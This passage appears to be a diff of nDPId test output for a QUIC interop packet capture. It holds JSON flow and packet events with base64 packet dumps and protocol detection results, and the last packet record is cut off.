00649{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434784,"flow_last_seen":1603816434784,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434784,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1603816434784,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434784,"pkt":"pJGxgjQ5PKn0qB\/sht1gCAvlBNgRQCABCwcKydWupNP+R2kegH0qBdAYDOmBAM0q4v2zvsWrrj0RUgTYFNnOCgoKCgghNSPe1nPIHwAARL5EcEFiriZrD+ET8JYIbR9oI0xm+rhrvJqfLILgs8D3Ue0qQNbVhIpNUU0tlgUCj3R+EB0BmYAvw6bLa5fuluEc0rN9r82heJLvapv7VUF9l51pFcem49jTWjYnj2oS6+waPQZXW+lgdvo6kQGqK89XfdzR1PgUM0aNtvz7T3DIGxshf8Bt0Mg12xV8BKvDf+WpUoRZwtsOWK2raSvEzJiBDtp9+7hN2cxP9JSjYr8Ymo+djN+4mxQxt78BMIwseR0wrK25i\/FCRyQZdy2RkGo1CRXgmyDAvyZwFE4TbrzLF307bQj1syPR3dOu7kPw5RNRQT+t3L+8NYL3mVwzg8kMaSuoFMxCZQvln3VAPeh3OJLvvw5+EMXFzx9zqWLfnKXdAHEumvxqEmlR\/1Fx5dKWAiLy4VEiB68pm8cbRcxMeWpZLJsU99vTYR1NQ7ym2LdsdYmsLFkMBHZj6r8XWpZpYhelGHgVf6dBgfvJoDoveKLzHHW7IQW0Q3CRZrurV397BZfMCs6JGA+7vvWU+gtIQ6+afCAD2BGOodmj\/NZoYjSTSz7UleFuiy\/Vh89Rle0L+paWGt8DSK3GtOoMd1TE8\/cyKXC0DuFP7OI\/tvNCsVqyrqekypnTROZiw\/hHDf4fjDoJUlr9W1Nwoksz+NUOe+agaP03VJPXO6c8eR1g16+4NUIoRiQvQ0PsA7\/u1\/P3EtbO6kdIsAPEzJh9T\/vDsjetpZCO9B\/5U78SmuNIpzUeyMa0pZ3WKYxs\/S8iP30dyOyRmNpGcQ2OhBlF2DpsSjXyEdMu816faZPTNRUFFFKzjtvsO4TkLkupS4QKX8ZqjlbPKIDbq7pJvPq1yQvdi8dyUb+GRdEu83F1kTyqMVj3VhOrCFJc0NwPk0QIQVaRiHCaQM\/M\/CAEON1vbjPSs5TR\/CU4ctB4lWQERooxF86Jf+vt4BRo+E+RBZpGyY9TSyW8BYhtJJUh4WEUdOJYaaV9TsJb\/JsQlajq3H+ad6FKE+sN0lRn0vyD+XLhK8WIG31ajHwqBioHhepDDhLwoYsiq3DO2TeKvxXp\/qbpXpHbmWZzrHqrW57rxAic64eJNK8nbylzcqNgf8E5i4dPbpF2trFKH9Xo28gQRRftLrNFAzIkDO4sN7G\/s0Kd5rqq+U4C+5hUgd+K5TPBViJ0+ZA5X+DO59wdV3YWk6fe3rpcJwZqkWMTHB+M4lLppO\/yNE76E8Kr\/Uqw7z2y9O2Hv+NvCttG9qY2iyEqocZxBUTD+UcJwLZ5GMkOh04nY5cKAEPxYCG+ZT+E6zrOvBnQQZqy8s3d7C7XsImaGAvBZu0AsMYvrJw6+l+x2h42qzLWSCCzqB8YHNMAoyjY5EEPiHDB4aqsw+AvUgp3kmejvZBqsLkmz4XspOgx4+v9KHKqq4bc+dtdIyTgZmNbhwtVFRrJwGMGlIJO3dYTW+eFWTrmyY\/kU+ejjmIORkV0nipRgOem0UmubxMEgQZJeGXrQKTimh1Z9tS70mAbbB\/uGZjC6Urq2uLNfRgZdNhSsyCMoYQw8molzzh2Na0ZIW7YN2Gu\/\/Rf\/n13siixEZmXrzTIF7wcraimRKQ6DvgjgbL2hCWeF8mCngEFXTnoVA=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434784,"flow_last_seen":1603816434784,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434784,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434784,"flow_last_seen":1603816434784,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434784,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02156{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1603816434792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434792,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAJ7ZAAEAR9yfAqAGAhfLO9KXYAbsE7LC9xgoKCgoI+QsGqtFYjA8AAETSGVf3NpHzKNMNdfh\/V\/noLzrrCJTWCW2izc6gcn2txyrZ3vTYFw9oti5N5Zd0a4DdA1cWLhNby0WoxjcoN3uUL31I6AuWTRtQmld72DVp1nFbW14vxWrhBIu4agIQU6NycrkwLEV1tOoKdYlrthTNMwD3M+k5+y\/jdMVtkD0R0YQR7BZOnM3kTX1bH0f\/eldh4oH8S4GerrQ\/hVn\/PHliyMbE95mBKeNH\/XBKjPaVH4SE5iyuZ4o0cAJX6zKU4lajsV6QVuEgsemLtfWCChsdFvaI+RSAzByJ2Y7eGCh7v+Gh4DXflSFSrZUSBAmTZoA0Zou6ukZtsJNjsWY68k6WygqpiwhMQJreLyjeXVzk7oyGDwHO\/hAvmg6xY5GXfBPf0ls2P2OW7n3w7L66S3D+as25Ka5fB\/1n04+oJmaw3ADdYqeBwRa3iSrQ7F7kK3NaNAJNRq2zS4fr\/b+ubURvNfR5staBQwIu\/o7Zb5+LwmaF9rZXHBu2Tz+8wv0lj8mhBUzLNtcfw27CNl1txh1+lvdEzBQ0+1QdwfOwk\/hlq7\/lf8GrfqmLhlEPTaPG7AFa3IPuxLh84mmZwaTAXQbxug33HwUz22AWbGI9PCbve31PjWm1LgNNd+7+kMpoKF52auR5lPAUr8zA5LwEBGR1mQkQ7NprWlORnGh5UWqvkJJHwL2k2IRTag51mGTH5MB1+cfSjVWNAtd\/8JuYCSBC+KNhtmuCXomT7rLvgXGj6o1sphXx4atNA9Dn9q1FcbinWgv+WKWZhnHGGP6dn+mrWu\/7bvpjXjrtDgIw7CyPxH34BjhKbxZ7QcB83XEhpxelpCRa6WUEloOBWGYIeMG0gZJIKjNZe0ll5C9J5n2Eq3sqg9KP3L2k8K+5dmEqspUGb1NUPPi+n6\/iFHU1fhMvh64hs66vVu1aXgLA9dFfJPSu+8U4SVAQ9LQIkLt1yLRcKmzv7K8F\/1wJz\/\/VA0FnXA\/S3tZfKvHD4A\/\/6XZ0e0JKAMn5kSF7uTeS5e5gdjg52fvbQjQd6m1d25cld76mtRwuKWprxy2fwcaEL3Y3Vh5fKfWjC4aclIK\/BmtRNjMNgHLI8jT0sKKwQDoyu6Dl2oMw70Jg67MXwUeukQTS75rXVHrbzUA2pmGH7aReYW35h4TyF+C9spNA\/zEJJt\/SQ8ZE+FX35GC6kc6V2qla+i+Pq5C7DccKCdXqXuLKAqiNDsgQzxhbb58C67FdYeSem4xijEQ544+5VsmSgDw5Bm+f8kn5ITiUXjSnERiDrW8LMlRKSAtIBNf8TTQIdO73pxNtEY6ZK+aCZSZfuGLY5fcX7OoNql4qaH5tgUcAKTmfbm2Rny2woTB6j6YC1lH0CTq+8yvsMUtLcbQZpIVgD2w91k\/DHu\/rqh55qa43XObRLAN1Cas7QHa1faPFa7Kyh\/Dx\/uu2xJFLfWHVfeKsvw4nX\/4k2v0Isffs\/nVZE\/mcAdyEmoN0MJ38PQMKNvx6iNUa45euWiJAQh0n\/9FPVkaW3p\/pu55m0RYAv15pyglEYDeOzb9cgqoBOBFbL5F17NfFlR1TUtETcnCdxPpozDGGzr8327bzSnjwgFfcwdPtJKYxjWOqhjxgehtiPwt9WJP1lnTBRJMRI29aK4qFwi9tCw=="} 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1603816434794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434794,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAVgBAAEARrFHAqAGAR8opqcRxEVIE7DJpzAoKCgoIvbmHXcmpQ\/MAAETSE2e30YHkAX2XVfEpCGfOjyF840fDKozk89FYV10qOipSbcKfBwadYKaP2PDi2A7GqANLJXLXd1Ra2Q\/d2lyOKDnoc8x8gM9WzcPPQTUPx43cTsdSrSCDxUnpnuaj6yGd2N3XRIkY0gYWRPuFX7h\/fh1NFO2iAOlIL6UUnbjkaQBPj5+DK9Tkt1jAUKuz5C\/VX5NyeiPZztoZxmFEUkRFMohO0yR1d9jvsEZjpJxu1T2xxVadymVUvn+nPUj7gyxMFoi5gdzyUkI6qww5VGYT9o89cKQc7vz3RQ1j5HNSltr8teBgazRyqIezFwRxXQZzC0mfyCRRks8zmpYilpgAUrd6iKSrwI8xpH1mLLYEiIEokh7Nku+MJsQdaeXhqFHBdzmvpP2d5lWx83GgFuE+Dkn\/A4rNg8OLbx8Hd749+SlXxx2p\/3FSVDsm0u8FwDQ0TGJxo01kEWYz07BfKbG+vmnmpdKMZ0c+mcf5\/mMTkSlmCtsSWEbhtyGBpHj6Gp3P\/PHHW6qpxotr0bYpBtsptMaDfY0LOv36qEIsdtyoyFrcuYBfxE2rbRJIu0Oe5vS9+mDEauvlYu+hTOBWRYf3GYbB3IuMocvdH3ge3fFDDBDMar6Z4AzQD3wB4++BlRSMJ4Op1PtaLNuhvgHr+zWIE03DBlRJ+VplDnanX09JNXhTwH3H+AjPz1EvGjgEK6+YfNJQaFV7U9mDD9Ruthi3HVvk8\/fOat3XDJUwyHcciWPLz4ceNf3L7rSem0SlSz\/9sPlFDV+6MnWDTjz2MgYr10nBv91OfLa6dUBNOUc77cMVlTY946uEOebqDqBU6HTwpDrQQPOhfekx\/cwyHgX1SPiQ2jm0cco9gMyY\/biNH5Ae0kYwjthPOjVJSM3sD8k6twZNkrRaDgELJdCga8uI83ZLsJc3njlrx+9GoCKhJeSUcJrXmCVv5wqbYrzBtzlNPONszxo+vENua67+NrZXgrgkQf3D5vueityfehPXawW3uctYARfHo8es3+9km4o77SaJb+CNNegl3uhaafpl6DgQ+IXvsGebd9bGzfvvtGEjqvC8yYEyCoMopVY8b6KF028XUOHjcIIrxB9oRWGWX1t6qcAtpr5\/re1at\/9am5lVA7Gd9Xl3d+sVGUgFor51U\/E91\/+E5M5Qa008RYdjk8bxHdEi5qflOIKkQWLgH2ptDuy4K34mY60YaJX9MzZJHqAGBiOJyz2vC72RgiQqDDvCwlaJzHF+wCxLSno3fJNj+SzLPPJvdkMYQcGDVNBzW9gLntYHCPYZmwYktaxLJE5kbFfSUHtFwGEgRhMzIViDRf0rfOdiTfn8q1XUwHnBs2i86bgzg+ASxD5k9QGSx0i6DQMqkcfTxkRGAof6BOxVRYc9567BYEdhO\/\/6PdEmvCY3IgYkogHWhz0bGjMlwbJhFZn0\/rOkfEZRLdzHN3yIdh4NhKhCdUPWLn5T0v7ILIVw+5EDKoGAZZ6+44v3WJA9M5YTPJa8YeOn2nx3N3YEQRsjiBBWJmbxBrqvM2C\/FaZgvmTqe758ClWLW0UAseHM27RoZnUVhDYxYjRpjAi\/X3AjK7Y7RKIDkLHbl2y5Bqku+ZBD8\/fxJnSy0Fo82DtOYzY3K0yqjhL16Ji16juysw=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1603816434802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434802,"pkt":"PKn0qB\/spJGxgjQ5ht1gDen3ACMRMCABSAB4FwEBvnZO\/\/4EYx0gAQsHCsnVrqTT\/kdpHoB9EVLCfAAjD9qPAAAAAAAIIsGdLtPZLyX\/AAAd\/wAAGxoqOko="} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434806,"flow_last_seen":1603816434806,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434806,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 01188{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1603816434806,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434806,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA3rwAADIBPo3K7txcwKgBgAMDrQAAAAAARQAFAOUCQAAtEfp2wKgBgMru3FyV3hFRBOy8bMIKCgoKCDeSrwfZ37epAABE0hxlYo43miI9fcBT4NXlNvUyuqRzjALgZuz5ZEFwqFAJHCLIyiKMek3pvG1TfFtz+5dPcMlRmn1CpjYaJxtvjy1D8CXnaCGG32gK7yv0bsGVDyQR4j6nJT4\/BgeG5XzS2QksROzvNGVoOiM5mh9Gcivemi\/Ltw3i6ZMLxPmYmJjzRy5MQrmw7yWShK3Q0gjXLf\/AtAzYy4CwwNnnbu4HeZWuRph4yFsqigrFQzQiWW5R3FQS9VXQNOqcmpoWiLrZR6ybbeDMER5x2lrIuMbSZiBdtZBwZCB3UjQ8D6WXWUDqOreiLaatWU6Uu1Td\/atS+bPWsWkMIdZrEKUJ78RDCkU46YaC6J9gteAdBR7kDvpyMncXYbFq+wnVLl7bEkkrsFjuC3evFwokMfctXgYgQAfhg9lrv5W\/V8C8b+SLLGJ1OLOrQb7nrBWiHG6ErtKg2rmOgmj5TlcyL7QCWDLLcB4wY4DlINVS1W1uHvEQAamMqwBYJNWP\/j7R3\/z2LLwmYTggeZKmyJokcN4daQ+u2GrxKAd9n8ootJ6q14bjsfNDrGHdfa2X78HqV8e67EzuwM679YHyVDVcjdxmRT1W7vvW2odG2VW9n2hGz7F7x1SewA4VbmCgaMBt\/706B\/PIDrHOTJjIgOwT5HqHFLiW3qe6lZFlcg8="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434806,"flow_last_seen":1603816434806,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434806,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.598216} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434806,"flow_last_seen":1603816434806,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434806,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.598216} 01197{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1603816434806,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434806,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA9\/UAAC0BNJ8znmliwKgBgAMK13gAAAAARQAFAGANQAAwEYa3wKgBgDOeaWKq1xFSBOwXccwKCgoKCNp6o2ufRw8jAABE0iMFIf440snHtaQbpLTAJ\/\/X0Fab87I\/F+H+s8yGuc1DMj7IRCVccfx4Cactg6LpwLVqjp+zMpHzZNYgE+iBS5eSSQ5R1VIB3pIpWgR10BZu4jbgQ9OaBdQdBe6vEK8fOHQlW4z6tk88yOBPCZ9MOnhihM498wDmMjf47XEsFDB\/7XQLydimXkVgGcIAWfjRxaXaSbJMTKKvAYms0ejZnQnA1ViSWn1r\/yep9jMB4Ha216Bw+8\/bwb+zk8NWbJkU1joIp6LywbS8BKMNdkB8CvtxCpRm+uw4pI4+h7Ir2vhBxo8l109zWnww9jHcvrRJCAiVTzHX0IEoiynIkV5hfnomioZ+rfmWQ18DCMdbTm0g8xPqOvlcFJ4riKg6eD9T\/06FbQ\/gfMez3fH3QaSeBi2r\/TOHCN1q7d2RWFd\/zfCVFlJ5yK8kQ\/oLJ\/FOsWcUoocGzw5wDW2ZJKlMLUQVjXb6yA+tyXiZShAlzoYqYN0T4FvgLVOww\/BRgkMCtO+yhyv+IhNBUZ7HwVrODYj2Fkrg4imzgs1D4nwXIka\/LTCNZAzA2HaoTn\/7dnEMFUXWjYgl6Vcr7VmuvChO2Lk2W46SOWZvSzgpXd4SdNTImeyxURq7mYLuukLenDSue9Jo+fNHodI6Y4FhBpA6\/I5BPKpcZmf\/iYU="} 02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1603816434806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434806,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAlgRAAEARiNnAqAGAhfLO9LMfEVIE7M5rxAoKCgoIJ05Q063kdsUAAETSbVS8wmTCayioaeEDJ0E7Ag7cjypWJklnY03J30b1mdxIVOpIcCjzHgeNDAUeVGYchax6RLhjbFwwP3C\/qxh1OO8O83qldI1OYg6x3GPEV9dhbYkGdVcPi3mfVEvzh3eS8WnvbGq3a4H9q5E9mDKl7buMufgYFu2sl2hZ01ag0mTo116H4e6bMaTreq2mI8kmjdhWNv55TN2Tbo0qvafHS0QviZ2QSLwEnQh4J+FGfyqh3grvQtfWOnpdR8XEyF6DDe7LL\/KlLa4NwBuxumU\/mO\/SIZ8t8LmkA6HXglfpy4tEgA4X4H4bW8fdrEeEGZwPR7eDrKq9RqBC5oKz7o\/7sHblT4DHTu2jye83jOCQIrWBGQDr5qMowkCj2D+qE7I8qnehPTO3H56afZrW0y49JxTPEZjoHsKNr9nvjAleyeYuaG86WZoQwGHWl1q\/do2IozVSEZwB4ZhhqabxXQE\/bLsaV5zpA9VarwnHFfuqnigS8SW0VNHxqwF42AsxDhJ1ZhApy7feoO0PJvvB2oMY1tQHPKfitH7JeAITAfnhaBY2YdONDcZk5oBrPbcpcIaGvU\/fGwgBQ3eir6s7iNWqBonZzNxwiJDZOCaLqzesvSlVLwJWfVmI2gbBdEGORyuW8xbxQbWWWdwZ2ECu1W5iPFYWZNmDQ5+p+xP+v2p\/q9Zri2SEgtxNFAlFqBgYJSEcW+nfhelld\/8X+b4MFcnpWATco0d+cUaZqJ4oe\/SV5lTkb+r+kBl4Fi8vLnITjPgbX+wBQtuHCeIhIpPSGbKfX0e3KDUQANebIeZRTrYcajrn1fFRlg2x0mgRQZE3eh9zOE\/6NevPmRKd3whKrB4OrWwNw\/SlNsbpFrYxTvS9sFHtHn\/Uuh9Itnw6lb7ILr8jkDVyk4MOLQUBCbcYUCUwkQa6hAPdxDGJGAORwPlVdN1voToAmZpSEQkdedqob3cIiQWZE5mZWy5zSP4b+LhOHf9ORwzuNzfdlhFMGkZsYkTm4i9Glf9wL0Xp7g4iBWo1g\/ERgUa+jz9aU\/5pM9Q2WKNxTb0oWtxniWBS8Lxmsp0IiDMHvpKQ3FN7FMkHusFent8sdfLu8GN0db\/htJ0tYyNHKrn+\/ukQfcuGZu1CZ8pcapnxZCaWzdysytGbuUF0sN2\/rXvBKbrUoGOi\/yQYHoSWzZe4tWPuiFsnEL3ZfeQW8rimwLD7SocitIb0a8vtHdDj\/GmOBVkGDMBGCNjj8XxF6Z2FQBo+4oYwGZuGhSsfMXRlNNFIfFsIHDW9OAdCunv3+x5JsDNF8ukUbcH9anX6B8hHXxQel+qabQ+aJWYsgcN\/hIaoFyjxqHkiZZ0o818BWeuCXCM0HKhfsQvXHf4ucJSBS8pc2EzJ5EUcQ\/dllBKRQbIrXCSSmkQFN4Gab363GSeUDA3rD\/GBoK5b27D4o8WAAnT3izN4JAXB+H9hgMX9A0cMJMRRasU585OfR07ntlSr7v2dExw66EL\/j1gd3QFNGbnOWToZJQicIfGV\/RtMUnXQYizsWgjoqWOPbw2wWrCqJhhbkxH+WHFJq0Mlwe32rpddmRI7+CtcRWBotdeJJ3xxfL7AYrxPw3cctN1iTAucOHdUCyCwYu\/wN2z2Li9nrj7J9G4sQVWMiuNy4Q=="} 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1603816434812,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434812,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAqqBAAEAR4XfAqAGAKHC\/PNIfEVIE7NGPyAoKCgoIcBuNCNTaAX0AAETSdrPs58Nd4whderbUQKKE9lqbT2Q5dWXTzCU30Nuk49rwMOYzrP9hqurmfQzCfogq7GSDP2MPa19fV3S+tzaflHzUKhrCPd4WQ1zA7H6cNQz\/lRUSpnQOWA0uQAhhAk+IZiglMuTPFh7AnCe7BzheAkGio7m9ekHUnqgl2NpmpwBBQY2oKhqJXzck7whQvip39IREDqyYyokoeQbGf08lhmJrRyewd07SbXyZCbXrujwWAH9r0NguWbmeWQiWcLTQKzzy4g6sxprDxKvBtQqoDYhvf3TyqAO0JNQb6gL5PnsCQpPHeNU738v6N2EJwaCYld1aJc1nCH2E7UBhR1ArdPBQvdD2ti3qSdfkpRxzBao2iX1sHBqDyALe5QD\/8T0uZDT7mlUSPcUSCQVDdwUfo1H5Gw1rANt1KrnL+D7EeJEt30JdQogzd+25oyRRh\/N33koVbRPkvhHtyEiSOAqUcF2k5Cww7VSNAXDrSWJ3nfwrxyNNGcTk1vbfU9FQjS7xTsCs1DcL3tIwTh\/F\/WqE0Qefzo3L9DVZUBF95w+x+NrXTVfTMFyerU2W9IiTbdFPifHfNydqoB4UA6KdAkF420byZMA9uYn1eronWwg6zZLfNiMThXS7INZHCSmquoQM48twpJMiC8QLa2BKxvBs5MAXCaES3COreo36bEsm9T7MBNPrIFP83x9oS3Dwv962KtUHkL2c7dl+XXAGkrol0zp9I4duf7jIdkEwKt6bINytvQ7NOpnpqMe2V\/od99AzLNPugOYXhVlxSXXrKEIlIoBOH\/vFhTYqHBMHhKDUlY83Lqn6rlae+5ldEt\/PYxQqh9RlSvlTKizFbfa1Pqv6mluoxnZYLP\/Q1ytoMX++Rq54VSapX63zxer6E2Fc0D7Z6VXClsXzgGzvHubNlFS8CT4jYJOejwFK\/O29QfOBILbMoFfrRtMOMvJfvtl8oUyriiHZ+EYZfkq6QJnQfCI7a6a+eQggExHpUAScmRSiTG+IYeca3pfV6WTNGjJdxkNLPzA1Z5SNnLP6zTKrtTQschUTrKbBMGzeDxKanuLhkyCaGkNHJ+E9jo1kVSKyouGn1Xz0RovKIuTZdoKvIiFgJRBRTx8b8VxdFjPJBtQkuwYKYuNAT\/hv6yiy\/pQHRSFz+yZmlAIEJ6DuwyjItKkBePqNsaDsx8Am8smaYhsjEC8vmWFe5WEi20pG0HiVg5O5kSIY5y\/ziwUKkKhqlYGirFSKeTAYJVJpGBDrmIOk\/QXL5fYdpveFiq0l+piS3JuL7TGHxf5NvUDjc8PuuHAyslhM7YLSZqEKmlqBzNKi4Z+4Im8\/q3Qs2A9hPYC\/n9KxnKOeVVg7MxmNr3suDiWJ08nJtK7eU\/3Dvj\/ONoqM5exqmHYkJmeB\/i3BYkfgX807asMnZtideGvH\/mPNTuLBycK5oBic1paBSf3T6UKDwFomFMK4zRvQ2RTDSsREhwoKBAz9DUi22uSOarNzx4IBJQAnBsKlI7YkUFuQf2bHXLeTlc3sjH22aTbkcpuNQVPhD3jsXLo+uLTFSabB0ejUHrkQJu7N55kc5Hjl\/l+it9+skmXrEhRgrnh+Crc2M75SVQkMGW4nqifvwIUFkprpgBKS3scwqrMQ4XMu9+qfHYRTYA=="} 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1603816434815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434815,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAv\/VAAEAR567AqAGAwb4KYuh7EVIE7CoKxAoKCgoIhDOd38iF14kAAETSuj\/6PpYLanmhufRbzBfIfJWqpHveuI64\/eSlK93oC4y6GPXD69PeaFagOPTyFkLIpcEu43y7OCQ1Z35Isk5hak2XHZkMptd7KrQ0EFnJR20xJ\/8s4Hh47hOyrjz0Tb8KAyxJMBwDu01llmEO1Z0EcUEdsorSKLQ\/VLYtmHdEq54kYxwJK6cbambFBrjQfMNHN\/UVp0rFqJczDmgAC1L2e2MT22BlqqRvoo0urlHqeJYQ0fzf9Ma12psTRriGSLqomnfjAnDrYcUuJXKUNEdXIMo0IvCKK8Z2qE53aAwCfpEoAKMk5gq0fRGK85o3RF+aZZt44gpgPnPnQ3e3amJGJyTfNiB0r1\/n8TxhrJAQSkdTnqq4YW8ifhktYPIg4k